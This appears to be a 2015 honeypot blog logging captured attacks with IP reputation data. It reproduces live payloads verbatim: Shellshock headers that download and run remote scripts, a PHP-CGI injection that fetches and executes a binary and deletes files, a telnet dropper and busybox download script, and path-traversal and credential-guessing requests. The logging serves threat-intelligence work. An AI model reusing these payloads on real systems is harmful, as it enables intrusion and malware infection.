Samstag, 12. Dezember 2015

173.193.232.34 - Shellshock code execution

BEGIN OF HTTP DATA:
2015-12-11 21:44:55
Source IP: 173.193.232.34
GET //cgi-bin/finger.cgi HTTP/1.1
Accept: */*
User-Agent: () { :;};echo; /bin/bash -c " echo 2014 | md5sum"
GET //cgi-bin/test.cgi HTTP/1.1
GET //cgi-mod/index.cgi HTTP/1.1
GET //cgi-sys/defaultwebpage.cgi HTTP/1.1
GET //cgi-sys/entropysearch.cgi HTTP/1.1
GET //cgi-sys/realsignup.cgi HTTP/1.1
GET //cgi-bin/test-cgi HTTP/1.1
GET //cgi-bin/finger.cgi HTTP/1.1

173.193.232[.]34

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS36351 SoftLayer Technologies Inc.

Mittwoch, 9. Dezember 2015

14.141.81.22 - multiple *.jsp GET attempts

BEGIN OF HTTP DATA:
2015-12-08
16:48:30
Source IP: 14.141.81.22
User-Agent: Wget/1.11.4 Red Hat modified
Accept: */*
GET /zmeu/zmeu.jsp HTTP/1.0
GET /iddqd/iddqd.jsp HTTP/1.0
GET /iesvc/iesvc.jsp HTTP/1.0
GET /wstats/wstats.jsp HTTP/1.0
GET /zecmd/zecmd.jsp HTTP/1.0
GET /idsvc/idsvc.jsp HTTP/1.0
GET /wincfg/wincfg.jsp HTTP/1.0


14.141.81[.]22

    Static Source: GeoIP data
  • Country: India
  • ASN: AS4755 TATA Communications formerly VSNL is Leading ISP
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/14.141.81.22

207.200.40.116 - GET db.php

BEGIN OF HTTP DATA:
2015-12-09 01:17:38
Source IP: 207.200.40.116
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.10-1ubuntu3.10
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


 END OF DATA

207.200.40[.]116

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS3728 Onramp Access Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/207.200.40.116

69.12.70.34 - GET db.php

BEGIN OF HTTP DATA:
2015-12-08 20:48:58
Source IP: 69.12.70.34
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.3
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


 END OF DATA

69.12.70[.]34

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS8100 QuadraNet, Inc
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/69.12.70.34
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/69.12.70.34

Sonntag, 6. Dezember 2015

103.238.131.21 - access attempt wp-config.php (traversel)

BEGIN OF HTTP DATA:
2015-12-06 01:42:29
Source IP: 103.238.131.21
GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1
Host: 195.169.125.87
Connection: close


 END OF DATA

103.238.131[.]21

    Static Source: GeoIP data
  • Country: Australia
  • ASN: AS23352 Server Central Network
remarks:        This address range is in use by an agile cloud hosting environment.

Samstag, 5. Dezember 2015

1.32.103.224 . Shellschock Download via http://lliillii.altervista.org

BEGIN OF HTTP DATA:
2015-12-05 02:52:29
Source IP: 1.32.103.224
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

 END OF DATA
The server was not responding to my manually download try.

1.32.103[.]224

    Static Source: GeoIP data
  • Country: Malaysia
  • ASN: AS4788 TM Net, Internet Service Provider
    Dynamic Source: IBM X-Force Exchange
  • Score: 7.1
  • Reference: https://exchange.xforce.ibmcloud.com/ip/1.32.103.224
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/1.32.103.224


Sonntag, 29. November 2015

46.105.8.133 - Scanning host via Python-urllib

BEGIN OF HTTP DATA:
2015-11-29 11:01:38
Source IP: 46.105.8.133
GET / HTTP/1.1
Accept-Encoding: identity
Host: 109.234.106.8:8080
Connection: close
User-Agent: Python-urllib/2.7


 END OF DATA
GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1
GET / HTTP/1.1
GET /script HTTP/1.1
GET /jenkins/script HTTP/1.1
GET /hudson/script HTTP/1.1
GET /login HTTP/1.1
GET /jenkins/login HTTP/1.1
GET /hudson/login HTTP/1.1
GET /jmx-console HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET /manager/html HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET /msd HTTP/1.1
GET /mySqlDumper HTTP/1.1
GET /msd1.24stable HTTP/1.1
GET /msd1.24.4 HTTP/1.1
GET /mysqldumper HTTP/1.1
GET /MySQLDumper HTTP/1.1
GET /mysql HTTP/1.1
GET /sql HTTP/1.1
GET /phpmyadmin HTTP/1.1
GET /phpMyAdmin HTTP/1.1
GET /mysql HTTP/1.1
GET /sql HTTP/1.1
GET /myadmin HTTP/1.1
GET /phpMyAdmin-4.2.1-all-languages HTTP/1.1
GET /phpMyAdmin-4.2.1-english HTTP/1.1
GET / HTTP/1.1
GET /sqlite/main.php HTTP/1.1
GET /SQLite/SQLiteManager-1.2.4/main.php HTTP/1.1
GET /SQLiteManager-1.2.4/main.php HTTP/1.1
GET /sqlitemanager/main.php HTTP/1.1
GET /SQlite/main.php HTTP/1.1
GET /SQLiteManager/main.php HTTP/1.1

46.105.8[.]133

    Static Source: GeoIP data
  • Country: France
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/46.105.8.133
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

31.16.134.211 - Shellshock via http://qupn.byethost5.com

BEGIN OF HTTP DATA:
2015-11-28 17:55:32
Source IP: 31.16.134.211
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
 -t500
 END OF DATA
At the time of my analyse the accessiable site only showed a HTML side related to Goolgeaddsense.

31.16.134[.]211

    Static Source: GeoIP data
  • Country: Germany
  • ASN: AS31334 Kabel Deutschland Vertrieb und Service GmbH
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/31.16.134.211

Page:
<!DOCTYPE html>
<!--[if IE 8 ]><html class="ie8"><![endif]--><!--[if IE 9 ]><html class="ie9"><![endif]--><!--[if (gt IE 9)|!(IE)]><!--><html><!--<![endif]-->
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title></title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <noscript><meta HTTP-EQUIV="REFRESH" content="0; url=/legacy"></noscript>
  <script src="//www.google.com/adsense/domains/caf.js" type="text/javascript"></script>
</head>
<body>
<script type="text/javascript">et=(function(){var
eD=window.location,eH={},dG,ej=eD.search.substring(1),eF,eG;if(!ej)
return eH;eF=ej.split("&");for(dG=0;dG<eF.length;dG++){eG=eF[dG].split('=');eH[eG[0]]=eG[1]?eG[1]:"";}
return eH;})();(function(){var
eD=window.location,X=document,cC=undefined,bd=encodeURIComponent,dA=X.getElementsByTagName('body')[0],eE;if(top.location!=eD)
top.location.href=eD.href;eE=X.createElement('script');eE.type='text/javascript';eE.src='/glp'+'?r='+(et.r?et.r:(X.referrer?bd(X.referrer.substr(0,255)):''))+'&u='+bd(eD.href.split('?')[0])+
(et.gc?'&gc='+et.gc:'')+
(et.cid?'&cid='+et.cid:'')+
(et.query?'&sq='+et.query:'')+
(et.a!==cC?'&a':'')+
(et.z!==cC?'&z':'')+
(et.z_ds!==cC?'&z_ds':'');dA.appendChild(eE);if(!window['googleNDT_'])
eD.replace('/legacy');})();</script>
</body>
</html>
 

Sonntag, 1. November 2015

5.39.251.4 - Backdoor.Perl.Shellbot.fj via trying.us.to (195.182.136.198)

BEGIN OF HTTP DATA:
2015-10-31 10:54:30
Source IP: 5.39.251.4
Country: GB RiskScore: 1 Malware: []
POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

<? system("cd /tmp ; wget trying.us.to/seed.jpg ; curl -O http://trying.us.to/seed.jpg ; fetch http://trying.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>
 END OF DATA
We have handled this sort of attack already in a previous blog post. The attack has not been seen since March.

195.182.136[.]198

    Static Source: GeoIP data
    Country: Russian Federation
    ASN: AS6858 Comlink Ltd

    Dynamic Source: IBM X-Force Exchange
    Score: 1.4
    Reference: https://exchange.xforce.ibmcloud.com/ip/195.182.136.198

    Dynamic Source: SANS Internet Storm Cast
    comment:IP is listed on SANS ISC
    comment:This entry alone does not indicate a threat, please check the link
    Reference: https://isc.sans.edu/api/ip/195.182.136.198

Feed search for 195.182.136[.]198
5.39.251[.]4

    Static Source: GeoIP data
    Country: United Kingdom
    ASN: AS30938 ahbr company limited

    Dynamic Source: SANS Internet Storm Cast
    comment:IP is listed on SANS ISC
    comment:This entry alone does not indicate a threat, please check the link
    Reference: https://isc.sans.edu/api/ip/5.39.251.4

Feed search for 5.39.251[.]4 


Samstag, 31. Oktober 2015

193.107.88.186 - Backdoor.Perl.Shellbot.jf via tecnoalianza.com

BEGIN OF HTTP DATA:
2015-10-31 01:14:48
Source IP: 193.107.88.186
Country: PL RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://tecnoalianza.com/a.log -O /tmp/a.log;curl -O /tmp/a.log http://tecnoalianza.com/a.log;perl /tmp/a.log;rm -rf /tmp/a.log*");'
Host: 195.169.125.87
Connection: Close

Domain Name: TECNOALIANZA.COM (66.240.252[.]12)
Registry Domain ID: 137741512_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.tucows.com
Registrar URL: http://tucowsdomains.com
Updated Date: 2014-12-18T11:44:43Z

193.107.88[.]186

    Static Source: GeoIP data
  • Country: Poland
  • ASN: AS48505 Kylos sp. z o.o.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/193.107.88.186

Feed search for 193.107.88[.]186

66.240.252[.]12

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS10439 CariNet, Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/66.240.252.12

Feed search for 66.240.252[.]12

Dienstag, 27. Oktober 2015

222.186.21.181 - ORACLE DB access

BEGIN OF ORACLE DATA:
2015-10-27 00:48:15
Source IP: 222.186.21.181
Country: CN RiskScore: 10 Malware: []
^@l^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@2^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(CONNECT_DATA=(COMMAND=status)(VERSION=169869568))
 END OF DATA

BEGIN OF ORACLE DATA:
2015-10-27 00:48:16
Source IP: 222.186.21.181
Country: CN RiskScore: 10 Malware: []
^@<D1>^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@<97>^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=dhaxxor))(COMMAND=status)(ARGUMENTS=64)(PASSWORD=dhaxxor)(SERVICE=LISTENER)(VERSION=135294976)))
 END OF DATA
Mainly I report this cause it was the first traffic found on the fake Oracle port. Even though User/Password dhaxxor does not look like a honest attempt.

222.186.21[.]181

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/222.186.21.181
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/222.186.21.181
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

Samstag, 24. Oktober 2015

218.94.94.86 - Shellshock perl via http://www.testvc.it/TESTONLY

BEGIN OF HTTP DATA:
2015-10-24 04:41:02
Source IP: 218.94.94.86
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget -O /dev/null http://www.testvc.it/TESTONLY; curl -O /dev/null http://www.testvc.it/TESTONLY; fetch http://www.testvc.it/TESTONLY; GET http://www.testvc.it/TESTONLY; lwp-download http://www.testvc.it/TESTONLY; lynx http://www.testvc.it/TESTONLY");'
Host: 109.234.106.8
Connection: Close

218.94.94[.]86

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/218.94.94.86
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
testvc.it

Registran
Organization:     MADE TO SELL SRL
Address:            VIA VITTORIO EMANUELE 33
                           CALENZANO                   

62.48.49[.]78

    Static Source: GeoIP data
  • Country: Italy
  • ASN: AS13284 Playnet S.R.L.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.48.49.78

185.93.185.47 - Shellsock ping to 212.47.238.143

BEGIN OF HTTP DATA:
2015-10-23 22:18:50
Source IP: 185.93.185.47
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close

212.47.238[.]143

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/212.47.238.143

Feed search for 212.47.238[.]143

185.93.185[.]47

    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS204209 Individual entrepreneur Tereschenko Marina Evgenievna
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.93.185.47
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/185.93.185.47

Feed search for 185.93.185[.]47

221.3.153.172 - Backdoor Perl Shelbot vi http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh

BEGIN OF HTTP DATA:
2015-10-23 06:47:24
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt -O /tmp/vira.txt;curl -O /tmp/vira.txt http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt;perl /tmp/vira.txt ; rm -rf vira.*");'
Host: 109.234.106.8
Connection: Close

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 221.3.153[.]172

    Source: Local Feed Database
  • Title: 221.3.153.172 - perl trojan via shellshock - cc 69.89.2.153
  • Reference: http://sendmespamids.blogspot.com/2015/10/2213153172-perl-trojan-via-shellshock.html
  • In db since: 2015-10-21 13:01:19.504158

Mittwoch, 21. Oktober 2015

74.94.108.29 - wp_woocommerce / virtuemart Cookie and Auth

EGIN OF HTTP DATA:
2015-10-21 10:56:18
Source IP: 74.94.108.29
Country: US RiskScore: 1 Malware: []
GET http://ya.ru:80/ HTTP/1.1
Content-Type: text/html
Host: ya.ru
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Authorization: Basic Og==
Cookie: nl-wag-lbsession=493641290.39121.584371104.3216573472; JSESSIONID=3F318DEF20EA379FF67AA05B51374618; 9db8b84e697d8de7acd04dee7393b60a=ae337258da9910c1feaf1f03b9df7725; wfvt_4053413342=56274d2d95c4e; CFTOKEN=98030C9E-58DE-4492-AAA47B1510FA5BF7; CFID=12366; ASPSESSIONIDQCAABTCD=PBIANEADMJBMMEHPKHPEKMAP; ASPSESSIONIDQASRRQRB=LCAABDADJPOGJALLBHMBGNBN; ASPSESSIONIDACACCQTS=BNGFBDADHOLOELKAMDJIFEME; ASPSESSIONIDCQTSABBT=CECMJGADBKMGLMCECPFLFPNN; ASPSESSIONIDAQDACTSD=AKIFDJDDAJNIJNAHIHELNJIB; X-Mapping-jfocjcpm=A58326710875159DFD1FE605A98F3A80; X-Mapping-ihnbadbn=8BEBCF55946DB931DDF1C87D24A0415C; X-Mapping-jdinjeol=FFDF3B29993B876585FCDFA9909EF15F; wp_shopp_bc38cde85b50c10d9bdebb0eb9193993=0ba9c5b80f14e3f69860cda7509a7077; site[currency]=Q2FrZQ%3D%3D.vETn; CmsDomain=ya.ru; incap_ses_199_81566=CowODjN5bwLj6hkOvh7DAvZKJ1YAAAAAB+BCoPnonUJVBYCp5xUKeQ==; incap_ses_407_81566=ZiaWKzMEIgHDhOlfWvSlBfVKJ1YAAAAAfo/1rHWeppqZ6cdvfuJygQ==; incap_ses_406_81566=VOYzJLd34ACTtwr062aiBfNKJ1YAAAAA5nUs9H2KvROsHSxk0yOoEg==;
 incap_ses_401_81566=1LbWZCya8SvkuymvnKOQBfVKJ1YAAAAAy8RJbgwe/Y9PBd7XDw6cGg==; incap_ses_120_81566=2RjJBLglW191UoOJbVOqAdJKJ1YAAAAAf1UQwaBqr5Q2wMpPHAQzaw==; incap_ses_261_81566=GZFGVnd3gXbLg9D+zkKfA9FKJ1YAAAAA2WcQTAGttQIVGqAIjg7fRg==; incap_ses_315_81566=x1z+JLhBoEOPMkXlOBtfBNBKJ1YAAAAAqbuqN5aJ+t3aC1WvABbnpw==; incap_ses_313_81566=/PXnYr1CfhNBs2r3LwBYBNBKJ1YAAAAA3TQ/Y6pEe9RAPouemwDbXg==; incap_ses_305_81566=RGA+XGM6xmecIhByTZQ7BM5KJ1YAAAAA3rjxLOTABAkf53cptw7paw==; incap_ses_288_81566=3Kc0cX2Hr3j8MJEq4i7/A8NKJ1YAAAAAAt+Y5yuHzk8KE/HuJXRI9g==; incap_ses_287_81566=w/wICF7G1GDzkOg8TKH7A79KJ1YAAAAAUL1px1Y01QJyJ/n/pGVI8A==; incap_ses_200_81566=OAVsNLkUm354oNE05YvGAqlKJ1YAAAAAxuJV8VYMtg3gV6RmKu1wew==; visid_incap_81566=8xGGpkYVRvilOCRZozp2W6lKJ1YAAAAAQUIPAAAAAADRL/a6/cPFkRp0rDsRnGWo; imp=S_n8yXBXBcel4PcTxg63NoDy6Loe610223Z0000Z0; ASPSESSIONIDSQTCSTCS=FKOFIBOCFBFEMNCGEPPIJDLF; bd45d1676dea992b2a6b94dd527b20c2=7011dcd6fd478fc235e3040e6a279ae1; virtuemart=36939bcb581af13e6e7823e25bad5880;
 d0c6e38cc40e095b29d8a68f70508dee=-; wp_woocommerce_session_fa8c6534742fba09c695479b86b3f50d=0e49327a58656322f9d7b3401f1d4603%7C%7C1445585631%7C%7C1445582031%7C%7C365c5ab325c06e102f5b29921898a4f2; uEUb_2132_lastact=1445412735%09forum.php%09; uEUb_2132_sid=InzUW5; uEUb_2132_lastvisit=1445409135; uEUb_2132_saltkey=YKpFR7pK; rg_cookie_session_id=549763849; PIWIK_SESSID=10361ae0ab110d2b93baf4907dde252d; corebb7bvisit=1445412063; GBALID=web01; ASPSESSIONIDSQBCDAQD=BHHHPNOABKBFDHFICLIHIFME; BIGipServerwww.agnis.net-HTTP=2493880074.20480.0000; EkAnalytics=0; EktGUID=66e92cf7-6a60-496f-aae8-11a40c0bac96; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=ya.ru&SiteLanguage=1033; CID=7ae028d37d407c5edcf586b3396dfcd75c48bed9s%3A40%3A%22d51ce68a4e9c6f58aa7ae28ce3b41bbd6e8738b1%22%3B; juSecondLang=fa; juFirstLang=en;
 PHPSESSID=c4fa633918d04c44e65d62eb7735adc8; ASPSESSIONIDQQRQRCDC=ILLFLNJDDBNCMELHLKFFGFBJ; Cacti=n1rek3j8pdj08nvj8bi6ot8dj5; ASP.NET_SessionId=3zc024ndj3yvajcyw5rw2vp1; .ASPXANONYMOUS=PB2ACGBC0QEkAAAAMjI2Mzg0OTMtYzk3My00NGE0LTkxYzgtZmE2MWUzY2U5MGUy--uyzTEzsohzI0t45c49Aeo2c2UuUsTfNVKkGB8VVk81; AIROS_SESSIONID=757da0eccfd2ab191585a35dd22cfde9; 1f9adce772dab79ce17b47eeff21ce20=3bc5dcaf79f897eeb113a3d87c756a55
Not to mention that this Honeypot does not run and content except "Hello World"

74.94.108[.]29

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS7922 Comcast Cable Communications, Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/74.94.108.29


Montag, 19. Oktober 2015

87.106.142.17 - Wordpress xmlrpc.php

BEGIN OF HTTP DATA:
2015-10-19 13:43:02
Source IP: 87.106.142.17
Country: DE RiskScore: 1 Malware: []
POST /xmlrpc.php HTTP/1.1
Host: 195.169.125.87
Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check

<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>

87.106.142[.]17

    Static Source: GeoIP data
  • Country: Germany
  • ASN: AS8560 1&1 Internet AG
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/87.106.142.17

Donnerstag, 15. Oktober 2015

113.126.198.158 - Telnet code execution after login, download via 158.69.203.229

BEGIN OF TELNET DATA:
2015-10-14 09:48:52
Source IP: 113.126.198.158
Country: CN RiskScore: 2.9 Malware: []
sh
shelrm -rf /tmp/* /var/*;cd /tmp || cd /var/;wget http://158.69.203.229/ff.sh;sh ff.sh;ftpget -u anonymous -p anonymous 158.69.203.229 ff2.sh ff2.sh;sh ff2.sh;tftp -r ff3.sh -g 158.69.203.229;sh ff3.sh
User: root
Pass:

 END OF DATA
The first script is a simple
#!/bin/sh
cp /bin/busybox ./
wget http://158.69.203.229/arm;cat arm >busybox;rm -f arm;chmod 777 busybox;./busybox
wget http://158.69.203.229/mips;cat mips >busybox;rm -f mips;./busybox
wget http://158.69.203.229/mipsel;cat mipsel >busybox;rm -f mipsel;./busybox
wget http://158.69.203.229/ppc;cat ppc >busybox;rm -f ppc;./busybox
wget http://158.69.203.229/sh;cat sh >busybox;rm -f sh;./busybox
The FTP server is also public available
ftp> ls
227 Entering Passive Mode (158,69,203,229,209,227)
150 Opening ASCII mode data connection for file list
-rwxr-xr-x   1 root     root        41652 Oct 12 23:33 arm
-rw-r--r--   1 root     root          523 Oct 10 17:04 ff2.sh
-rwxr-xr-x   1 root     root        50743 Oct 15 03:28 find
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mips
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mipsel
-rwxr-xr-x   1 root     root        41128 Oct 12 23:33 ppc
-rwxr-xr-x   1 root     root        38324 Oct 12 23:33 sh
The file sh is
sh: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
The files are available via my DRIVE share 
the password is "infected" 

158.69.203[.]229

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/158.69.203.229

Feed search for 158.69.203[.]229

113.126.198[.]158

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: IBM X-Force Exchange
  • Score: 2.9
  • Reference: https://exchange.xforce.ibmcloud.com/ip/113.126.198.158
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/113.126.198.158

Feed search for 113.126.198[.]158


 
 
 

Dienstag, 13. Oktober 2015

186.56.42.11 - Shellschock attemp via 46.105.96.205

BEGIN OF HTTP DATA:
2015-10-13 07:26:22
Source IP: 186.56.42.11
Country: AR RiskScore: 10 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 46.105.96.205/TEST231;curl 46.105.96.205/TEST231;fetch 46.105.96.205/TEST231;lwp-download 46.105.96.205/TEST231;GET 46.105.96.205/TEST231");'
Host: 195.169.125.87
Connection: Close

46.105.96[.]205

    Static Source: GeoIP data
  • Country: France
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/46.105.96.205

186.56.42[.]11
    Static Source: GeoIP data
  • Country: Argentina
  • ASN: AS22927 Telefonica de Argentina
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/186.56.42.11
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
